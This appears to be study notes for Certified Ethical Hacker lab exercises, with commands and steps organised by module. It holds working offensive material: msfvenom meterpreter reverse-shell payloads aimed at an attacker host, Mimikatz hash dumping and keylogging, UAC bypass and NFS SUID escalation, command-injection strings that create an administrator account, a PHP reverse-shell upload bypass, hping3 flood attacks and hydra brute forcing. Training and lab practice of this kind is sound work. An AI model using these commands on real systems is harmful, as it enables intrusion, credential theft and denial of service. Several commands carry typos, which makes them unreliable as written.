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Module 03: Scanning Networks

Lab1-Task1: Host discovery (Page 224)

  • nmap -sn -PR [IP]
    • -sn: Disable port scan
    • -PR: ARP ping scan
  • nmap -sn -PR [RANGE] -oG [FILE]
    • -oG: Grepable output to file
  • nmap -sn -PU [IP]
    • -PU: UDP ping scan
  • nmap -sn -PE [IP or IP Range]
    • -PE: ICMP ECHO ping scan
  • nmap -sn -PP [IP]
    • -PP: ICMP timestamp ping scan
  • nmap -sn -PM [IP]
    • -PM: ICMP address mask ping scan
  • nmap -sn -PS [IP]
    • -PS: TCP SYN Ping scan
  • nmap -sn -PA [IP]
    • -PA: TCP ACK Ping scan
  • nmap -sn -PO [IP]
    • -PO: IP Protocol Ping scan

Lab2-Task4: Port and Service Discovery (Page 251)

  • nmap -sT -v [IP]
    • -sT: TCP connect/full open scan
    • -v: Verbose output
  • nmap -sS -v [IP]
    • -sS: Stealth scan/TCP hall-open scan
    • Can be used to bypass firewall
  • nmap -sX -v [IP]
    • -sX: Xmax scan
  • nmap -sM -v [IP]
    • -sM: TCP Maimon scan
  • nmap -sA -v [IP]
    • -sA: ACK flag probe scan
    • No response means filtered: stateful firewall present
  • nmap -sU -v [IP]
    • -sU: UDP scan
  • nmap -sN -T4 [IP]
    • -sN: NULL scan
  • nmap -sI -v [IP]
    • -sI: IDLE/IPID Header scan
  • nmap -sY -v [IP]
    • -sY: SCTP INIT Scan
  • nmap -sZ -v [IP]
    • -sZ: SCTP COOKIE ECHO Scan
  • nmap -sV -v [IP]
    • -sV: Detect service versions

Lab3-Task2: OS Discovery (Page 280)

  • nmap -A -v [IP]

    • -A: Aggressive (-O -sV -sC --traceroute)
  • nmap -O -v [IP]

    • -O: OS discovery
  • nmap –-script smb-os-discovery.nse [IP]

    • -–script: Specify the customized script
    • smb-os-discovery.nse: Determine the OS, computer name, domain, FQDN, workgroup, and current time over the SMB protocol (Port 445 or 139)
  • Useful

    • nmap -sC -sV -p- -A -v -O -T4 [IP]

      • -sC: Performs a script scan using the default set of scripts.
    • nmap -sP [RANGE]

      • Obtain all active hosts via Ping scanning (or use -sn -PS)
    • nmap -sC -sV -p- -A -v -O -T4 x.x.x.x,y,z

      • Then several scans on important hosts on same subnet
    • List of nmap scripts:

Module 04: Enumeration (Page 351)


Lab1-Task1: NetBIOS enumeration using nbstat (Page 357)

  • nbtstat -a [IP]
    • -a: Display NetBIOS name table
  • nbtstat -c
    • -c: List content of the NetBIOS name cache

Lab1-Task3: NetBIOS enumeration using NSE Script (Page 361)

  • nmap -sV -v --script nbstat.nse [IP]
    • nbstat.nse: Performs NetBIOS enumeration

Lab2-Task1: Enumerate SNMP using snmp-check (Page 365)

  • nmap -sU -p 161 [IP]
    • Check if SNMP port is open
  • snmp-check [IP]

Lab2-Task4: Enumerate SNMP using NSE (Page 379)

  • nmap -sU -p 161 --script snmp-sysdescr [IP]

    • snmp-sysdescr: Server type and OS details
  • nmap -sU -p 161 --script snmp-processes [IP]

    • snmp-processes: Running processes and associated ports
  • nmap -sU -p 161 --script snmp-win32-software [IP]

    • snmp-win32-software: Applications running on Windows machine
  • nmap -sU -p 161 --script snmp-interfaces [IP]

    • snmp-win32-software: Information about OS, network interfaces and applications installed
  • Other:

    • SMB enumeration:
      • nmap -p 445 --script smb-enum-shares [IP]
      • nmap -p 445 --script smb-enum-users --script-args smbusername=xx,smbpassword=xx [IP]
    • RDP scanner:
      • In Metasploit: use auxiliary/scanner/rdp/rdp_scanner

Module 05: Vulnerability Analysis (Page 475)

OpenVAS, Nessus, Nikto

Lab2-Task1: Perform Vulnerability Analysis using OpenVAS (Page 499)

  • Scan -> Tasks -> Task Wizard

Lab2-Task4: Perform Web Servers and Applications Vulnerability Scanning using Nikto (Page 556)

  • nikto -h [URL] -Tuning [X] -o [OUTPUT_FILE] -F txt
    • Tuning: specific test to perform, i.e 4==Injection

Module 06: System Hacking (Page 568)

Lab1-Task1: Perform Active Online Attack to Crack the System's Password using Responder (Page 572)

  • Linux:

    • chmod +x ./
    • sudo ./ -I eth0
  • Linux:

    • Home/Responder/logs/SMB-NTMLv2-SSP-[IP].txt
    • sudo john /home/ubuntu/Responder/logs/SMB-NTLMv2-SSP-

Lab2-Task1: Escalate privileges using privilege escalation tools... (Page 75)

  • Create malicious executable

    • msfvenom -p windows/meterpreter/reverse_tcp --platfrom windows -a x86 -e x86/shitaka_ga_nai -b "\x00" LHOST=ATTACKER -f exe > EXE_FILE
  • Listener:

    • msfconsole
    • use exploit/multi/handler
    • set payload windows/meterpreter/reverse_tcp
    • exploit -j -z
  • After executing file on VICTIM

    • session -i X
    • getuid
  • Dump hash

    • run post/windows/gather/smart_hashdump
    • If insufficient privileges:
      • getsystem -t 1
    • If still problems then:
      • background
      • use exploit/windows/local/bypassuac_fodhelper
      • set SESSION X

Lab2-Task2: Hack a Windows Machine using Metasploit and perform post-exploitation using Meterpreter (Page 101)

  • Using steps from previous lab and after getting a Meterpreter session.
    • sysinfo, getuid, search -f FILE, keyscan_start, keyscan_dump, shell, dir /a:h, sc queryex type=service state=all, wmic

Lab2-Task3: Escalate privileges by exploiting vulnerability in pkexec (Page 117)

Lab2-Task4: Escalate privileges in Linux machine by exploiting misconfigured NFS (Page 120)

  • TCP/2049 nfs_acl
  • In victim:
    • Install nfs-kernel-server
    • Add */home (rw,no_root_squash) to /etc/exports
    • Restart nfs-kernel-server
  • Install nfs-common
  • List shares: showmount -e [TARGET_IP] or nmap -sV --script=nfs-showmount [TARGET_IP]
  • Mount: mount -t nfs [TARGET_IP]:/[SHARED_FOLDER] /tmp/share
  • Copy bash: cp /bin/bash /tmp/share && chmod +s /tmp/share/bash
  • Go to victim (via ssh for example) and execute bash -p on the [SHARED_FOLDER]

Lab2-Task5: Escalate privileges by bypassing UAC and exploiting sticky keys (Page 135)

  • Elevating on Windows 11 and replacing sticky keys with a elevated cmd

Lab2-Task6: Escalate privileges to gather hashdump using Mimikatz (Page 147)

  • After having a privileged Meterpreter session
    • load kiwi
    • lsa_dump_sam
      • Load NTLM Hash of all users
    • lsa_dump_secrets
      • LSA secrets that contain User password, IE passwords, service account passwords, SQL passwords.
    • password_change -u Admin -n NTLM_HASH -P NEW_PASSWORD

Lab3-Task4: Hide data using white space steganography (Page 204)

  • Hide content
  • Reveal content
    • snow -C -p "PASSWORD" NEW_FILE

Lab3-Task5: Image steganography using OpenStego and StegOnline (Page 208)

Lab3-Task9: Covert Channels using Covert_TCP (Page 266)

  • Attacker:
    • Create a file with a secret: echo "Secret"->message.txt
    • Copy and paste covert_tcp.c
    • Compile: cc -o covert_tcp covert_tcp.c
  • Target:
    • tcpdump -nvvx port 8888 -I lo
    • Copy and paste covert_tcp.c
    • Compile: cc -o covert_tcp covert_tcp.c
    • ./covert_tcp -dest TARGET_IP -source ATTACKER_IP -source_port 9999 -dest_port 8888 -server -file /home/ubuntu/Desktop/Receive/receive.txt
    • Tcpdump captures no packets
  • Attacker
    • ./covert_tcp -dest TARGET_IP -source ATTACKER_IP -source_port 8888 -dest_port 9999 -file /home/attacker/Desktop/send/message.txt
    • Wireshark (message string being send in individual packet)

Module 07: Malware Threat

Lab1-Task1: Gain control over a victim machine using njRAT RAT Trojan (Page 319)

  • njRAT

    • Default port: 5552
  • ProRAT

    • Default port: 5110

Lab1-Task3: Create a Trojan server ussing Theef RAT Trojan (Page 347)

  • Theef RAT
    • Default port: 9871 or 6703

Lab3-Task2: Perform a string search using BinText (Page 378)

  • BinText
    • Extract text from executable

Lab3-Task4: Analyze File using Detect It Easy (DIE) (Page 384)

  • DIE
    • File Entry point, entropy, hash

Module 08: Sniffing

Lab2-Task1: Password Sniffing using Wireshark (Page 563)

  • Attacker
    • Wireshark
  • Target
  • Attacker
    • Stop capture
    • File->Save as
    • Filter: http.request.method==POST
    • Edit->Find Packet-> Find string equals to pwd form field

Module 10: Denial-of-Service

Lab1-Task2: Perform a DoS Attack on a Target Host using hping3 (Page 119)

  • Target:
    • Wireshark->Ethernet
  • Attacker
    • hping3 -S [Target IP] -a [Spoofable IP] -p 22 -flood
      • -S: Set the SYN flag
      • -a: Spoof the IP address
      • -p: Specify the destination port
      • --flood: Send a huge number of packets
  • Target
    • Check Wireshark
  • Attacker (Perform PoD)
    • hping3 -d 65538 -S -p 21 –flood [Target IP]
      • -d: Specify data size
      • -S: Set the SYN flag
  • Attacker (Perform UDP application layer flood attack)
    • nmap -p 139 (check service)
    • hping3 -2 -p 139 –flood [IP]
      • -2: Specify UDP mode
  • Other UDP-based applications and their ports
    • CharGen UDP Port 19
    • SNMPv2 UDP Port 161
    • QOTD UDP Port 17
    • RPC UDP Port 135
    • SSDP UDP Port 1900
    • CLDAP UDP Port 389
    • TFTP UDP Port 69
    • NetBIOS UDP Port 137,138,139
    • NTP UDP Port 123
    • Quake Network Protocol UDP Port 26000
    • VoIP UDP Port 5060

Module 11: Session Hijacking

Lab2-Task1: Detect Session Hijacking using Wireshark (Page 204)

  • A high number of ARP requests indicate that a system is acting as a client for all IP addresses.

Module 13: Hacking Web Servers

Lab2-Task1: Crack FTP Credentials using a Dictionary Attack (Page 326)

  • nmap -p 21 [IP]
  • hydra -L usernames.txt -P passwords.txt


  • hydra -l -P -t 4 ssh
  • hydra -l -P -t 4 smb
  • hydra -l -P http-post-form ":<login_credentials>:<invalid_response>"
    • `hydra -l bob -P http-post-form "/Login:username=^USER^&pwd=^PASS^:Login Failed"``

Module 14: Hacking Web Applications

Lab1-Task5: Identify Web Server Directories using various tools (Page 359)

  • nmap -sV --script=http-enum [IP]
    • Enumerate applications, directories, and files of the web server
  • gobuster dir -u [IP] -w [WORDLIST]
    • Directory brute-forcing mode. Fast paced enumeration of hidden files and directories
    • gobuster dir -u [IP] -w /usr/share/wordlists/dirb/common.txt -t 50 -x php,html,txt -q
      • dir : directory listing
      • -u : host
      • -w : wordlists
      • -t : threads int / Number of concurrent threads (default 10)
      • -x : enumerate hidden files htm, php
      • -q : –quiet / Don’t print the banner and other noise

Lab2-Task1: Perform a Brute-force Attack using Burp Suite

  • Set proxy for browser:
  • Burpsuite
  • Type random credentials
  • Capture the request, right click->send to Intrucder
  • Intruder->Positions
  • Clear $
  • Attack type: Cluster bomb
  • Select account and password value, Add $
  • Payloads: Load wordlist file for set 1 and set 2
  • Start attack
  • Filter by status and length that are different from the others. filter status==302
  • Open the raw, get the credentials
  • recover proxy settings

Lab2-Task4: Exploit Parameter Tampering and XSS Vulnerabilities in Web Applications (Page 407)

  • Log in a website, change the parameter value (id) in the URL
  • Conduct a XSS attack: Submit script codes via text area

Lab2-Task6: Enumerate and Hack a Web Application using WPScan and Metasploit (Page 431)

  • wpscan --api-token XXXXX --url --plugins-detection aggressive --enumerate u
    • --enumerate u: Specify the enumeration of users
    • --enumerate vp: Specify the enumeration of vulnerable plugins
    • API Token: Register at
  • service postgresql start
  • msfconsole
  • use auxiliary/scanner/http/wordpress_login_enum
  • show options
  • set PASS_FILE password.txt
  • set RHOST
  • set RPORT 8080
  • set USERNAME admin
  • run
  • Find the credential

Lab2-Task7: Exploit a Remote Command Execution Vulnerability to Compromise a Target Web Server (DVWA low level security) (Page 440)

  • If found command injection vulnerability in an input textfield
  • | hostname
  • | whoami
  • | tasklist| Taskkill /PID /F
    • /PID: Process ID value od the process
    • /F: Forcefully terminate the process
  • | dir C:\
  • | net user
  • | net user user001 /Add
  • | net localgroup Administrators user001 /Add
  • Use created account user001 to log in remotely

Lab2-Task8: Exploit a file upload vulnerability at different security levels (Page 7)

  • msfvenom -p php/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -f raw
  • For LOW DVWA:
    • Create a file with output (reverse.php)
    • File Upload -> select reverse.php
    • Create a file with output (reverse.php.jpg)
    • File Upload -> select reverse.php.jpg
    • Intercept call with Burp Suite and change file name to reverse.php
  • For HIGH DVWA:
    • Create a file with output (reverse.php.jpg) and add GIF98 as header
    • File Upload -> select reverse.php.jpg
    • Command Injection -> | copy reverse.php.jpg reverse.php
  • msfconsole
  • use exploit/multi/handler
  • set payload php/meterpreter/reverse_tcp
  • set LHOST=[IP]
  • set LPORT=[PORT]
  • run
  • Go to http://[DVWA]/dvwa/hackable/uploads/reverse.php

Module 15: SQL Injection

Lab1-Task2: Perform an SQL Injection Attack Against MSSQL to Extract Databases using sqlmap (Page 75)

Module 16: Hacking Wireless Networks

Lab3-Task5: Crack a WPA2 Network using Aircrack-ng (Page 173)

  • Having the .pcap file with the WPA2 handshake.
  • aircrack-ng -a2 -w [WORDLIST_FILE] capture.pcap
    • -a2: WPA2 cracking attack

Module 17: Hacking Mobile Platforms

Lab 1-Task 4: Exploit the Android Platform through ADB using PhoneSploit (Page 229)

  • ADB port: TCP/5555
  • cd Phonesploit
  • python3 -m pip install colorama
  • python3
  • Connect a new phone -> 3
  • Enter [PHONE_IP]
  • Access shell on a phone -> 4
  • Navigate shell

Module 18: IoT and OT Hacking

Lab 2-Task 1: Capture and Analyze IoT traffic using Wireshark (Page 284)

  • Having the .pcap file with the IoT devices traffic with the MQTT Broker
  • In Wireshark filter by mqtt protocol
  • The headers flag meaning for Publish Message packets in Page 304
  • Select a Publish Message packet listed on Info column to see the message.
  • Sequence: Publish Message -> Publish ACK -> Published Received -> Publish Release -> Publish Complete

Module 20: Cryptography

  • Calculate hash: HashCalc, MD5 Calculator, HashMyFiles (compare hashes)
  • Online hashing lookup service:
  • Encode/Decode: BCTextEncoder, CryptoForge, CrypTool (.hex files, Analyze with given algorithm and key size)
    • Check the encoded message to see which tool was used as it will say as part of the header.

Lab4-Task1: Perform Disk Encryption using VeraCrypt (Page 415)

  • Create/Encrypt

    • Click VeraCrypt
    • Create Volume
    • Create an encrypted file container
    • Specify a path and file name
    • Set password
    • Select FAT
    • Check box in Random Pool
    • Move the mouse randomly for some seconds, and click Format
    • Mount into Drive Letter
    • Input password
  • You might have an outer partition with a password and an inner hidden partition with another password, depending on the password you use on the mounting then is the partition that you get.

  • Other: BitLocker Drive, Rohos Disk Encryption

Appendix: Covered Tools

Useful Links

Importan keywords

  • Img hidden - Openstego
  • .hex - Cryptool
  • Whitespace - SNOW
  • MD5 - Hashcalc & MD5 Calculator
  • Encoded - BCTexteditor
  • Volume & mount - Veracrypt

Example questions and walkthroughs